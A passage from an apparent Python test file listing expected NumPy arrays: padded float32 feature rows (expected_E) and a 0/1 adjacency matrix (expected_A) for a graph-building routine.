0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00]], dtype=np.float32)
expected_E = np.array([[np.zeros(shape=(S)),
[1.00000000e+00, 3.80209351e+00, 4.73696232e+00,
2.55590057e+00, 1.94406962e+00, 3.78623873e-01, 0, 2.52958393e+00, 2.83850670e+00,
1.11976581e-17, 3.14159274e+00, 2.22044605e-16,
1.10479271e+00, 0, 0, 0, 0, 0,
-4.57205915e+00, 8.80855896e+02, 7.82728672e+00,
3.35431993e-01, -1.00192909e+01, 0, 0, 0, 0, 0],
[0, 7.28560734e+00, 7.28560686e+00,
1.16697186e-06, 2.57872105e+00, 9.72977459e-01,
6.93147182e-01, 6.20201683e+00, 3.82296467e+00,
6.42421180e-16, -5.30027373e-16, -2.22044605e-16,
-1.79768915e-06, 0, 0, 0, 0, 0,
-1.92229003e-01, 0, 2.19786674e-01,
-5.78640960e-02, -3.56009841e-01, 0, 0, 0, 0, 0],
[0, 1.09825363e+01, 1.13401499e+01,
3.00454664e+00, 2.43993378e+00, 7.23135471e-01,
1.09861231e+00, 8.73160267e+00, 6.66147280e+00,
-2.44219418e-17, 3.14159274e+00, 4.44089210e-16,
1.10479355e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712175e+01, 1.45712175e+01,
9.06385296e-08, 2.57872105e+00, 9.72977459e-01,
1.38629436e+00, 1.24040346e+01, 7.64593363e+00,
1.28483897e-15, -1.06005580e-15, -6.66133815e-16,
-1.39626337e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[1.00000000e+00, 3.80209351e+00, 4.73696232e+00,
2.55590057e+00, -3.41464520e-01, 1.50724781e+00, 0, -3.67243147e+00, -9.84460473e-01,
4.68176749e-17, -3.14159274e+00, -2.22044605e-16,
1.10479271e+00, 0, 0, 0, 0, 0,
-4.57205915e+00, 8.80855896e+02, 7.82728672e+00,
3.35431993e-01, -1.00192909e+01, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, 1.94406879e+00, 3.78623903e-01, 0, 2.52958250e+00, 2.83850908e+00,
1.11970799e-17, 3.14159274e+00, 2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
[0, 7.28560972e+00, 7.28560925e+00,
5.55161478e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201588e+00, 3.82297087e+00,
6.42420386e-16, -5.30027532e-16, -2.22044605e-16,
-8.55211340e-07, 0, 0, 0, 0, 0,
-7.39678815e-02, 0, 1.09441765e-01,
-1.31108221e-02, 1.17330207e-02, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454545e+00, 2.43993306e+00, 7.23135352e-01,
1.09861231e+00, 8.73160076e+00, 6.66147757e+00,
-2.44209194e-17, 3.14159274e+00, 4.44089210e-16,
1.10479283e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712175e+01, 1.45712166e+01,
1.07633355e-06, 2.57872057e+00, 9.72977340e-01,
1.38629436e+00, 1.24040337e+01, 7.64593601e+00,
1.28484437e-15, -1.06005464e-15, -6.66133815e-16,
-1.65806284e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 7.28560734e+00, 7.28560686e+00,
1.16697186e-06, -5.62873721e-01, 2.16861582e+00,
6.93147182e-01, -6.20201015e+00, -3.82297587e+00,
-6.42420810e-16, 5.30027955e-16, 4.44089210e-16,
1.79768915e-06, 0, 0, 0, 0, 0,
-1.92229003e-01, 0, 2.19786674e-01,
-5.78640960e-02, -3.56009841e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, -3.41465622e-01, 1.50724840e+00, 0, -3.67243123e+00, -9.84464645e-01,
4.68172051e-17, -3.14159274e+00, -2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209589e+00, 4.73696327e+00,
2.55589986e+00, 1.94406736e+00, 3.78624082e-01, 0, 2.52958083e+00, 2.83851242e+00,
1.11972230e-17, 3.14159274e+00, 2.22044605e-16,
1.10479534e+00, 0, 0, 0, 0, 0,
-1.31169045e+00, 6.74720097e+00, 1.67359757e+00,
1.66524708e-01, 1.47069490e+00, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28561068e+00,
-1.07633332e-06, 2.57871890e+00, 9.72976923e-01,
6.93147182e-01, 6.20201063e+00, 3.82297993e+00,
6.42419380e-16, -5.30027955e-16, -2.22044605e-16,
1.65806284e-06, 0, 0, 0, 0, 0,
-6.20821118e-01, 0, 8.71631145e-01,
1.06285838e-03, -7.25033402e-01, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454521e+00, 2.43993092e+00, 7.23134995e-01,
1.09861231e+00, 8.73158836e+00, 6.66149330e+00,
-2.44247823e-17, 3.14159274e+00, 4.44089210e-16,
1.10479617e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712204e+01, 1.45712204e+01,
-8.27077542e-07, 2.57871866e+00, 9.72976804e-01,
1.38629436e+00, 1.24040203e+01, 7.64596176e+00,
1.28483802e-15, -1.06005549e-15, -6.66133815e-16,
1.27409032e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 1.09825363e+01, 1.13401499e+01,
3.00454664e+00, -4.65556115e-01, 1.91248298e+00,
1.09861231e+00, -9.87444305e+00, -4.80743980e+00,
8.24374220e-17, -3.14159274e+00, -4.44089210e-16,
1.10479355e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28560972e+00, 7.28560925e+00,
5.55161478e-07, -5.62873423e-01, 2.16861558e+00,
6.93147182e-01, -6.20201254e+00, -3.82297611e+00,
-6.42420704e-16, 5.30027796e-16, 4.44089210e-16,
8.55211340e-07, 0, 0, 0, 0, 0,
-7.39678815e-02, 0, 1.09441765e-01,
-1.31108221e-02, 1.17330207e-02, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209589e+00, 4.73696327e+00,
2.55589986e+00, -3.41465712e-01, 1.50724864e+00, 0, -3.67243266e+00, -9.84464884e-01,
4.68171190e-17, -3.14159274e+00, -2.22044605e-16,
1.10479534e+00, 0, 0, 0, 0, 0,
-1.31169045e+00, 6.74720097e+00, 1.67359757e+00,
1.66524708e-01, 1.47069490e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209374e+00, 4.73696232e+00,
2.55589986e+00, 1.94406843e+00, 3.78623903e-01, 0, 2.52958202e+00, 2.83850884e+00,
1.11975100e-17, 3.14159274e+00, 2.22044605e-16,
1.10479379e+00, 0, 0, 0, 0, 0,
-3.67839885e+00, 8.79898254e+02, 6.06281567e+00,
3.71687233e-01, -4.08100748e+00, 0, 0, 0, 0, 0],
[0, 7.28560781e+00, 7.28560734e+00,
5.21172012e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201397e+00, 3.82297063e+00,
6.42420863e-16, -5.30027426e-16, -2.22044605e-16,
-8.02851446e-07, 0, 0, 0, 0, 0,
-2.02662915e-01, 0, 2.20212236e-01,
-5.84062114e-02, -3.69073659e-01, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454569e+00, 2.43993258e+00, 7.23135293e-01,
1.09861231e+00, 8.73159790e+00, 6.66148043e+00,
-2.44220195e-17, 3.14159274e+00, 4.44089210e-16,
1.10479414e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712185e+01, 1.45712194e+01,
-1.58617510e-07, 2.57872009e+00, 9.72977221e-01,
1.38629436e+00, 1.24040298e+01, 7.64594460e+00,
1.28483982e-15, -1.06005559e-15, -6.66133815e-16,
2.44346097e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 1.45712175e+01, 1.45712175e+01,
9.06385296e-08, -5.62871814e-01, 2.16861534e+00,
1.38629436e+00, -1.24040337e+01, -7.64593506e+00,
-1.28483844e-15, 1.06005591e-15, 6.66133815e-16,
1.39626337e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454545e+00, -4.65554893e-01, 1.91248250e+00,
1.09861231e+00, -9.87444973e+00, -4.80742836e+00,
8.24393609e-17, -3.14159274e+00, -4.44089210e-16,
1.10479283e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28561068e+00,
-1.07633332e-06, -5.62871873e-01, 2.16861534e+00,
6.93147182e-01, -6.20201731e+00, -3.82296968e+00,
-6.42419433e-16, 5.30027373e-16, 4.44089210e-16,
-1.65806284e-06, 0, 0, 0, 0, 0,
-6.20821118e-01, 0, 8.71631145e-01,
1.06285838e-03, -7.25033402e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209374e+00, 4.73696232e+00,
2.55589986e+00, -3.41464877e-01, 1.50724792e+00, 0, -3.67243147e+00, -9.84461367e-01,
4.68175161e-17, -3.14159274e+00, -2.22044605e-16,
1.10479379e+00, 0, 0, 0, 0, 0,
-3.67839885e+00, 8.79898254e+02, 6.06281567e+00,
3.71687233e-01, -4.08100748e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, 1.94406879e+00, 3.78623903e-01, 0, 2.52958250e+00, 2.83850908e+00,
1.11970799e-17, 3.14159274e+00, 2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28560972e+00,
2.49256118e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201588e+00, 3.82297158e+00,
6.42420122e-16, -5.30027690e-16, -2.22044605e-16,
-3.83972434e-07, 0, 0, 0, 0, 0,
-6.45447522e-02, 0, 1.05444595e-01,
-1.05051743e-02, -1.32832214e-01, 0, 0, 0, 0, 0],
[0, 1.09825382e+01, 1.13401518e+01,
3.00454569e+00, 2.43993282e+00, 7.23135352e-01,
1.09861231e+00, 8.73160076e+00, 6.66147947e+00,
-2.44219004e-17, 3.14159274e+00, 4.44089210e-16,
1.10479343e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
[0, 1.45712175e+01, 1.45712166e+01,
1.07633355e-06, -5.62873960e-01, 2.16861582e+00,
1.38629436e+00, -1.24040203e+01, -7.64595652e+00,
-1.28484427e-15, 1.06005580e-15, 6.66133815e-16,
1.65806284e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454521e+00, -4.65556622e-01, 1.91248310e+00,
1.09861231e+00, -9.87444305e+00, -4.80744314e+00,
8.24356883e-17, -3.14159274e+00, -4.44089210e-16,
1.10479617e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28560781e+00, 7.28560734e+00,
5.21172012e-07, -5.62873483e-01, 2.16861558e+00,
6.93147182e-01, -6.20201111e+00, -3.82297564e+00,
-6.42420492e-16, 5.30027690e-16, 4.44089210e-16,
8.02851446e-07, 0, 0, 0, 0, 0,
-2.02662915e-01, 0, 2.20212236e-01,
-5.84062114e-02, -3.69073659e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, -3.41465622e-01, 1.50724840e+00, 0, -3.67243123e+00, -9.84464645e-01,
4.68172051e-17, -3.14159274e+00, -2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209589e+00, 4.73696375e+00,
2.55589986e+00, 1.94406760e+00, 3.78624111e-01, 0, 2.52958155e+00, 2.83851218e+00,
1.11973512e-17, 3.14159274e+00, 2.22044605e-16,
1.10479486e+00, 0, 0, 0, 0, 0,
-7.31544256e-01, 1.80469227e+00, 3.98014307e-01,
-1.71806701e-02, -2.58314610e-01, 0, 0, 0, 0, 0],
[0, 7.28561115e+00, 7.28561163e+00,
-6.79789594e-07, 2.57871914e+00, 9.72976923e-01,
6.93147182e-01, 6.20201254e+00, 3.82297897e+00,
6.42419963e-16, -5.30027796e-16, -2.22044605e-16,
1.04719754e-06, 0, 0, 0, 0, 0,
-4.29591179e-01, 0, -7.36617744e-02,
-4.40440699e-02, -9.07294303e-02, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
np.zeros(shape=(S)),
[0, 1.45712204e+01, 1.45712204e+01,
-8.27077542e-07, -5.62872589e-01, 2.16861534e+00,
1.38629436e+00, -1.24040298e+01, -7.64594603e+00,
-1.28483876e-15, 1.06005464e-15, 6.66133815e-16,
-1.27409032e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454569e+00, -4.65555817e-01, 1.91248286e+00,
1.09861231e+00, -9.87444592e+00, -4.80743694e+00,
8.24373029e-17, -3.14159274e+00, -4.44089210e-16,
1.10479414e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28560972e+00,
2.49256118e-07, -5.62872946e-01, 2.16861558e+00,
6.93147182e-01, -6.20201445e+00, -3.82297397e+00,
-6.42420439e-16, 5.30027796e-16, 4.44089210e-16,
3.83972434e-07, 0, 0, 0, 0, 0,
-6.45447522e-02, 0, 1.05444595e-01,
-1.05051743e-02, -1.32832214e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209589e+00, 4.73696375e+00,
2.55589986e+00, -3.41465414e-01, 1.50724852e+00, 0, -3.67243314e+00, -9.84463811e-01,
4.68172481e-17, -3.14159274e+00, -2.22044605e-16,
1.10479486e+00, 0, 0, 0, 0, 0,
-7.31544256e-01, 1.80469227e+00, 3.98014307e-01,
-1.71806701e-02, -2.58314610e-01, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209470e+00, 4.73696280e+00,
2.55590081e+00, 1.94406915e+00, 3.78623962e-01, 0, 2.52958345e+00, 2.83850884e+00,
1.11972619e-17, 3.14159274e+00, 2.22044605e-16,
1.10479391e+00, 0, 0, 0, 0, 0,
-2.75101089e+00, 7.84158997e+02, 4.00388569e-01,
2.45321058e-02, -1.18683946e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
[0, 1.45712185e+01, 1.45712194e+01,
-1.58617510e-07, -5.62872350e-01, 2.16861534e+00,
1.38629436e+00, -1.24040318e+01, -7.64594173e+00,
-1.28483844e-15, 1.06005538e-15, 6.66133815e-16,
-2.44346097e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825382e+01, 1.13401518e+01,
3.00454569e+00, -4.65555400e-01, 1.91248274e+00,
1.09861231e+00, -9.87444878e+00, -4.80743361e+00,
8.24388779e-17, -3.14159274e+00, -4.44089210e-16,
1.10479343e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561115e+00, 7.28561163e+00,
-6.79789594e-07, -5.62872410e-01, 2.16861534e+00,
6.93147182e-01, -6.20201635e+00, -3.82297254e+00,
-6.42419645e-16, 5.30027426e-16, 4.44089210e-16,
-1.04719754e-06, 0, 0, 0, 0, 0,
-4.29591179e-01, 0, -7.36617744e-02,
-4.40440699e-02, -9.07294303e-02, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209470e+00, 4.73696280e+00,
2.55590081e+00, -3.41465175e-01, 1.50724828e+00, 0, -3.67243195e+00, -9.84463096e-01,
4.68173837e-17, -3.14159274e+00, -2.22044605e-16,
1.10479391e+00, 0, 0, 0, 0, 0,
-2.75101089e+00, 7.84158997e+02, 4.00388569e-01,
2.45321058e-02, -1.18683946e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S))], dtype=np.float32)
expected_A = np.array([[0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 0., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 1., 1., 1., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
